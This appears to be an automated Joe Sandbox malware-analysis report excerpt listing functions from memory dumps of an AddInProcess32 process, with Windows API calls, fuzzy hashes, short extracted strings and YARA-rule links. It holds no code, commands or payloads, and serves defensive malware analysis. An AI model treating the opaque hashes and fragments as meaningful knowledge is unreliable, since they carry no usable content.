Source File: 00000006.00000002.1565702278.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6360000_AddInProcess32.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 386f531258ee807d39034b23c239978b6102f9acad542ffbbc29ca745a57715d
Instruction ID: 8f9ad60993f504f555292cd0a5a9e3a8c2ef2cd49e1df9e4817b760b8c1321e0
Opcode Fuzzy Hash: 386f531258ee807d39034b23c239978b6102f9acad542ffbbc29ca745a57715d
Instruction Fuzzy Hash: F41128B58003499FDB10DF9AC945BEEFBF8EB48320F108419E914A3641C379A944CFA5

Function 013DAA44 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,013DBCE4), ref: 013DBF1E

Memory Dump Source

Source File: 00000006.00000002.1553626397.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_13d0000_AddInProcess32.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 58c9214a2456e78179f95127037f7499fce4eb8c3e04309d66f7ff6828fee55c
Instruction ID: a2c256d9c1f198023fa8f1ff02e0cec16b02bbb025af548c40e27ff532e8914f
Opcode Fuzzy Hash: 58c9214a2456e78179f95127037f7499fce4eb8c3e04309d66f7ff6828fee55c
Instruction Fuzzy Hash: 461123B6C002098BDB10CF9AD444BDEFBF8EB48214F11806AD919A7300C375A545CFA1

Function 0636AF28 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0636AF85

Memory Dump Source

Source File: 00000006.00000002.1565702278.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6360000_AddInProcess32.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 733d0572ec8b659e76f621d2d728e317091419c3642d8d67b3d51b2b1778caeb
Instruction ID: 9954d34b93bb0f9908bd0b403d915eb326e5a36ccc1afdd4586ad5e392bcedf8
Opcode Fuzzy Hash: 733d0572ec8b659e76f621d2d728e317091419c3642d8d67b3d51b2b1778caeb
Instruction Fuzzy Hash: 421106B5800349DFDB10CF9AC945BDEFBF8EB48320F108419E958A7241D379A944CFA5

Function 066B0DA0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 066B0E05

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 2cca0b67e5f706cb365b9b6fc7e3dc309727f05c9812001965c7260e652f4aae
Instruction ID: e9a3314e0bf62cb9441010a636a519e74dd1d3a2ebb11f6e20ce805390669d80
Opcode Fuzzy Hash: 2cca0b67e5f706cb365b9b6fc7e3dc309727f05c9812001965c7260e652f4aae
Instruction Fuzzy Hash: 811110B5C00249CECB20DF9AD944BCEFBF4EB48314F10842AE818A3200C338A585CFA1

Function 06367408 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0636746D

Memory Dump Source

Source File: 00000006.00000002.1565702278.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6360000_AddInProcess32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d563bb1fbedc2b99f0a404002105314286f8a3fca05415e407276447132cb20f
Instruction ID: f6cb5f757de096bd41fcd7eb1c8b654d1cda064a35603a61fb982fd6f9af91cd
Opcode Fuzzy Hash: d563bb1fbedc2b99f0a404002105314286f8a3fca05415e407276447132cb20f
Instruction Fuzzy Hash: 4611F5B58003499FDB10DF9AC945BDEBBF8EB48324F108459E918A3300C375A944CFA1

Function 06365BC8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0636746D

Memory Dump Source

Source File: 00000006.00000002.1565702278.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6360000_AddInProcess32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 758eef75ff57d8b887f1c2a3b7d923657322ff6ad37c2fbd636f8d6b083254dc
Instruction ID: 627d28f750ef95e419e07a41f28c073112ccf785b498ae3c3873c4c7bc2c04f8
Opcode Fuzzy Hash: 758eef75ff57d8b887f1c2a3b7d923657322ff6ad37c2fbd636f8d6b083254dc
Instruction Fuzzy Hash: BA11E3B5800349DFDB20DF9AC849BDEBFF8EB48314F108419E918A7200C375A954CFA5

Function 05A95FBC Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 05A986F5

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 112387d775a1890a972b369ed20e660c78d0dd6b079608851943db117cfa24b3
Instruction ID: bc4b208ebb529af8ec4ca8570b73d9215101c06b9ae5e5dfc6398ba5137b5469
Opcode Fuzzy Hash: 112387d775a1890a972b369ed20e660c78d0dd6b079608851943db117cfa24b3
Instruction Fuzzy Hash: A411F5B5800359DFDB20DF9AC585BDEBBF8EB48320F108459E919A7340C379A944CFA5

Function 05A9DAC0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05A9E11D

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 7fd2d501e29aa4dda2d1962b97f207021bde551212272e601bb1dbf07822b9a1
Instruction ID: 13c4470cb1c14bf154b99636036541bf6a63ca21ac0af81d904e51b97ea884d4
Opcode Fuzzy Hash: 7fd2d501e29aa4dda2d1962b97f207021bde551212272e601bb1dbf07822b9a1
Instruction Fuzzy Hash: 5F1133B49003498FCB20DF9AC445BDEFBF8EB48320F208419D919A7301C775A944CFA4

Function 05A9E0C3 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05A9E11D

Memory Dump Source

Source File: 00000006.00000002.1565583666.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a90000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 20df5206398849665ab869c044d7163558c36fa7d765d2e5ab833dffaed21f84
Instruction ID: ff9fdced25b2bdaca9e9a7a145ff6a70df0a334599d8d61e1686be0fc3b91db7
Opcode Fuzzy Hash: 20df5206398849665ab869c044d7163558c36fa7d765d2e5ab833dffaed21f84
Instruction Fuzzy Hash: ED11FEB59002498FCB20DF9AD885B9ABBF8EB48320F208419D919A7200C779A9448FA5

Function 066B0DA8 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 066B0E05

Memory Dump Source

Source File: 00000006.00000002.1566846233.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_66b0000_AddInProcess32.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: e44a324488bbe60369c0d143631aee71864311d592cfd9d1d3bef32035b7460a
Instruction ID: 885c44db40e9378641e40e3bfe56096b2c42f03a7b29289c196a702d37813959
Opcode Fuzzy Hash: e44a324488bbe60369c0d143631aee71864311d592cfd9d1d3bef32035b7460a
Instruction Fuzzy Hash: 0011EDB5C00249CFCB20DF9AD844BCEFBF4AB48324F10842AD818A3200D379A545CFA5

Function 07DB1E58 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

(_q, xrefs: 07DB2059

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: 763cfa37edd3ea2c4c04acd75efcf668ad7dcea90252282ba2f579e3a2cfac8d
Instruction ID: 8e14cc58352c3b98dca4ac52c79deb653bb0ff5200b89fb41f15f55f6d35edf9
Opcode Fuzzy Hash: 763cfa37edd3ea2c4c04acd75efcf668ad7dcea90252282ba2f579e3a2cfac8d
Instruction Fuzzy Hash: 6A91A1B2A00209DFDB24DF78D8505EEBBB2FF89354F148169D906AB340DB31E945CBA1

Function 07DB0040 Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

,kAq, xrefs: 07DB01AE

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ,kAq
API String ID: 0-1094898869
Opcode ID: e3e57dc6b4fc81df05d7bf3e2bf27af11dab0e5de7d37ebe744a0ef28bcc4d64
Instruction ID: ad23015b103df2ad591a6e33b9828d3f05a2428b6733945df55e75fcbbcd0ad4
Opcode Fuzzy Hash: e3e57dc6b4fc81df05d7bf3e2bf27af11dab0e5de7d37ebe744a0ef28bcc4d64
Instruction Fuzzy Hash: 19919070B00315DFDB28DBB4D894A9EBBB2BF89300F64816DD506AB391DB759C46CB90

Function 07DB2418 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

(_q, xrefs: 07DB2622

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: dddc7183249ed13842be1334290fa7f88b48b6c95576c571d5f2755495cdb347
Instruction ID: e06f21b046c611dc7daec488de527b73d0f43e5321b37e89cee0421fb0cd680d
Opcode Fuzzy Hash: dddc7183249ed13842be1334290fa7f88b48b6c95576c571d5f2755495cdb347
Instruction Fuzzy Hash: 3E819FB2A00255CFDB24DF68C9606EDBBF1FF89314F148169D806AB350EA35ED45CBA1

Function 07DD1C4C Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

d^Zj, xrefs: 07DD3110

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: d^Zj
API String ID: 0-504463722
Opcode ID: 61878bfc5d6671da732edec36bdd99315a6fdb5931809771b4f96da4ab97be10
Instruction ID: 13b42dbe9f6b84ee33885f2fb043071ad5d8ee47348efd1d095158fd9bb26295
Opcode Fuzzy Hash: 61878bfc5d6671da732edec36bdd99315a6fdb5931809771b4f96da4ab97be10
Instruction Fuzzy Hash: 4B617C71B007059FCB259FB9D88496EBBF6FFC92107148A2DE946C7721DA34EC068B61

Function 07DD08C0 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

(_q, xrefs: 07DD0980

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: fd8f29923bb6decaa423c3f76455d133e5f7c962c889855cea3b42227009b8de
Instruction ID: 4b581eafc79d7fce76cd549e6450b05ecf17c3614d14a0d7be5b2004d3bc4c7f
Opcode Fuzzy Hash: fd8f29923bb6decaa423c3f76455d133e5f7c962c889855cea3b42227009b8de
Instruction Fuzzy Hash: 0251E2B07043159FDB14EB28D890A6EBBE6FFC9210B14856AE905CB361DF34EC46C7A1

Function 07DD31C0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

(q, xrefs: 07DD32AD

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 7f7948b3522782c92803a4c13e37d7bc789cae915cec5939eed4f38eef29f4f8
Instruction ID: e7aa64407d0c348e9564973f5ad457d533c7b76d85798ae1a166d12f9ff2435c
Opcode Fuzzy Hash: 7f7948b3522782c92803a4c13e37d7bc789cae915cec5939eed4f38eef29f4f8
Instruction Fuzzy Hash: 4A518270F043198FDB586BB8A42927EB6A2FFC82007548629D506DB394EF3C9D428B55

Function 07A3EF2B Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'q, xrefs: 07A3EF44

Memory Dump Source

Source File: 00000006.00000002.1571985880.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a30000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 2097b92fb221701354fa5f5493d2ae20a8c69606fdd374a8d8cede7bb95fd347
Instruction ID: b19a488570491725091e5baa6b75fe94abdfc7367db4b8ec1e48ea5b6f9ca96b
Opcode Fuzzy Hash: 2097b92fb221701354fa5f5493d2ae20a8c69606fdd374a8d8cede7bb95fd347
Instruction Fuzzy Hash: 8E51E271B006269FCB14DF6DC4808AEFBB5FF89310B11866AE469DB390DB70AC558BD1

Function 07DD5078 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

Hq, xrefs: 07DD516E

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Hq
API String ID: 0-1594803414
Opcode ID: d7e22987cdb5abda5faa7dd21c5adea5960b702236ca5bdd501cc72f9fbe584d
Instruction ID: b3c7dc5d3221373b75f7f612fbd6595b356b1479af281ccbc88f5370092effe0
Opcode Fuzzy Hash: d7e22987cdb5abda5faa7dd21c5adea5960b702236ca5bdd501cc72f9fbe584d
Instruction Fuzzy Hash: 7E51F4B03042155FC715DB68D854A6EBBE6FFC9210F15816AE409CB3A2DB34DC45CBA5

Function 07DD0B20 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

(_q, xrefs: 07DD0CB5

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: 77cf616aa15a5f8975249863cc1e366bf00d86efc542bf11670c2d29e57bbabc
Instruction ID: 348939bab9e7e2b21093810b30a0379c32b2ce5b49f00aada649257f2881c537
Opcode Fuzzy Hash: 77cf616aa15a5f8975249863cc1e366bf00d86efc542bf11670c2d29e57bbabc
Instruction Fuzzy Hash: 17515F70A10209DFCB15EF78D854AADBBB2FF89314F148469E406AB3A0DF349C46CB91

Function 07DBB0BD Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

PHq, xrefs: 07DBB20B

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 702e32a4760d0a7a49394ceb9d06890e725c2f0db06af6fd849ad7d96c77da81
Instruction ID: f084cef4061bc8c41f738de60599d267c6cc379ede39812fec60369087e52ea4
Opcode Fuzzy Hash: 702e32a4760d0a7a49394ceb9d06890e725c2f0db06af6fd849ad7d96c77da81
Instruction Fuzzy Hash: 1341DFB0B0021A8FDB28AF75D4546AEBBE7AF89340F24456AD442DB385DF35DC42C7A1

Function 07DB26D8 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

LRq, xrefs: 07DB26F3

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: f6841d6fad3a4d0fe5f9028ea86ac65fadcdae0d1f800d745444a99920ee7b12
Instruction ID: 4396cc5dc9f1492b5f6f711935b31ea38ab434cf33e57964bd135bc53d0264c8
Opcode Fuzzy Hash: f6841d6fad3a4d0fe5f9028ea86ac65fadcdae0d1f800d745444a99920ee7b12
Instruction Fuzzy Hash: A731ACB5E0021ADBDB24CBA8C4557DEF7B2FF49310F108529E802EB250EB74A942CB50

Function 07DB26C8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

LRq, xrefs: 07DB26F3

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: c23fc3c8f4cc7512eb1c0aebb3cac22d8e293a7fa43c51f630b02bb5f5fab2e4
Instruction ID: 95129b8eb69a0666c5e2c72dbdeece2c7b11ad02cc81664930a9ad81b6fb79e1
Opcode Fuzzy Hash: c23fc3c8f4cc7512eb1c0aebb3cac22d8e293a7fa43c51f630b02bb5f5fab2e4
Instruction Fuzzy Hash: 3C319EB5E10209DBDB24DE68C4917DEF7B1FF49310F208515E802FB250EB71AD428B94

Function 07DD13D3 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

4aZj, xrefs: 07DD1397

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 4aZj
API String ID: 0-4197133413
Opcode ID: 6c14728583af845da7ff2150a0c39c3ddf982e8eb5784070d4a5c6a13755f27f
Instruction ID: e7760a44dd473c60aa81b34cf1a310f93704533655ae3c858f033167a151ff01
Opcode Fuzzy Hash: 6c14728583af845da7ff2150a0c39c3ddf982e8eb5784070d4a5c6a13755f27f
Instruction Fuzzy Hash: 9231D276A00209AFCF05DFA4E988AEDBBB2FF88310F058015F912A7260DB35AD51CF51

Function 07DDEC29 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

DZj, xrefs: 07DDECAE

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: DZj
API String ID: 0-3928733632
Opcode ID: 5ac87e6700f78a00070b7753f12228bb7b10ce7998a0870ed61b46cea4cd6e51
Instruction ID: 0504301a06f50ad0bcd921ef6807db147c76c0439645aaf5f9a7427f361951d1
Opcode Fuzzy Hash: 5ac87e6700f78a00070b7753f12228bb7b10ce7998a0870ed61b46cea4cd6e51
Instruction Fuzzy Hash: AA219FB6B006068FC721CF5DD89099EFBF6EF89310B15852AD5598F221CB70ED458BA1

Function 07DD83B0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$q, xrefs: 07DD83FB

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: 1ea15971fec7b1a0c538c7ac224676b39756dedfd2676d48a6c4f46c19a656ee
Instruction ID: 9dd5c209deee809ba3a9fd94c908d1c248719860df564a8987d34e768c763d7d
Opcode Fuzzy Hash: 1ea15971fec7b1a0c538c7ac224676b39756dedfd2676d48a6c4f46c19a656ee
Instruction Fuzzy Hash: 0FF0C2F1B002168FCF268E45E98466DF762EB84352F159575D909DB240DB75ED02D710

Function 07DDD910 Relevance: .6, Instructions: 593COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b4400e277e7759212ac072e2fcddb5766a5ce34033d22281e174be3a58d5c3
Instruction ID: 8d3ee1dbc075cade0f1f3b201eeff81d40a507f8fc09836dca9ed48e306135bd
Opcode Fuzzy Hash: b9b4400e277e7759212ac072e2fcddb5766a5ce34033d22281e174be3a58d5c3
Instruction Fuzzy Hash: 632239B0B002069FDF14DF68C884AAEFBB2FB89310F15852AE415EB355DA75EC41CB91

Function 07DB3088 Relevance: .6, Instructions: 564COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90a93a8d5c1c378587479a80b2ca7c22a7bd64b2c07a3d4bde710bb3f353289
Instruction ID: c781c47022baaf67b14de5db67be560cd5b8ed7dee59cbdf83496df1f88db23a
Opcode Fuzzy Hash: c90a93a8d5c1c378587479a80b2ca7c22a7bd64b2c07a3d4bde710bb3f353289
Instruction Fuzzy Hash: 1A2292B07002129FDB35AB38D49525CB7A3FFC9259B504A6AE046CF354EE39EC46C791

Function 07DD6B00 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf6946c06306c8478fc9f310e734ea3eb81d66d9c41022e902fde3c10b9a24a
Instruction ID: ba56bd0814154b72c7506749e3d80b230f2e678996cb7bf1be1469c1f1b2e025
Opcode Fuzzy Hash: 9bf6946c06306c8478fc9f310e734ea3eb81d66d9c41022e902fde3c10b9a24a
Instruction Fuzzy Hash: DB029AB0B002059FDB24DB68D954BADFBB2FF88355F148569D40AAB380DB35EC46CB90

Function 07DB4B08 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621289f02205fe86aca2490d98fe9ce863d78c87a4312887eb49477ab15b570d
Instruction ID: 12fef617cfa3eb80d12ab8a5e30ae4ab23bf84bbead3be018126668d12d87cc7
Opcode Fuzzy Hash: 621289f02205fe86aca2490d98fe9ce863d78c87a4312887eb49477ab15b570d
Instruction Fuzzy Hash: 30E18E74A00245DFDB24DFA8D490AADBBB2FF89311F248469E406DB395DB35EC42CB90

Function 07DDC771 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a83c77ea77c945c0e02b0905738f785066b037da1fd48d85aa388670bca6c4c5
Instruction ID: a8cce2a1cf93ea0a95c5e604b2f9d645abfc73caa9bbdda15126a720cc38d6a9
Opcode Fuzzy Hash: a83c77ea77c945c0e02b0905738f785066b037da1fd48d85aa388670bca6c4c5
Instruction Fuzzy Hash: CF12B434A02208DFCB29DFB0E59899DBB72FF49315B64456DD406AB351CB3AAD92CF40

Function 07DDC780 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e21b04f1e5a88c950461f64a11778bf3661e750b1d20e948c97c0ed152954ede
Instruction ID: 942bc7b09e91f1639fdbdf92ce0986d8ab228e77023086d0a567ea7b6300f986
Opcode Fuzzy Hash: e21b04f1e5a88c950461f64a11778bf3661e750b1d20e948c97c0ed152954ede
Instruction Fuzzy Hash: 1212B334A02208DFCB29DFB0E59899DB772FF49315B64856DD406AB351CB3AAD92CF40

Function 07DDD2D0 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21923c0a654dc30df04fab3d55bf1db65e87bae5efd29e781252c1f078bc44b0
Instruction ID: 75241a798d07128ad3e5173193ef5b9a43914171fcfff63c51bf21ccd3077b48
Opcode Fuzzy Hash: 21923c0a654dc30df04fab3d55bf1db65e87bae5efd29e781252c1f078bc44b0
Instruction Fuzzy Hash: 95D19DB4B002199FDB14DBB8E4546ADBBF2BF89210F14856AE405EB394DF78DC418BA1

Function 07DDD900 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574271002.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7dd0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e652dca7afc22491d31c7ba34938447ad8803a76dc0aa386bb3b46e7b8269cf6
Instruction ID: 9d393014c32f9efea7107ba0da62c73cb84c084a93e7eb6c7b7c79d24531b9dd
Opcode Fuzzy Hash: e652dca7afc22491d31c7ba34938447ad8803a76dc0aa386bb3b46e7b8269cf6
Instruction Fuzzy Hash: CBA116B4F0020A9BDF24CA68C580BADFBB2FB49314F258927E415DB351DA75EC85CB91

Function 07DBDEC8 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7db0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcbafca004460f15e95cf96837acc527181dc439a521a593da42509f42d02c35
Instruction ID: 95ebd05618e6ead752ba57d113a36fa066ebbcc8f0ce3ea6ebbd5aa723983daa
Opcode Fuzzy Hash: bcbafca004460f15e95cf96837acc527181dc439a521a593da42509f42d02c35
Instruction Fuzzy Hash: 289191B1A0430A8FDB30CFA9D880BEEFBB2FF85310F10456AE156D7255D635E8458B91

Function 07DB8848 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1574140484.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false

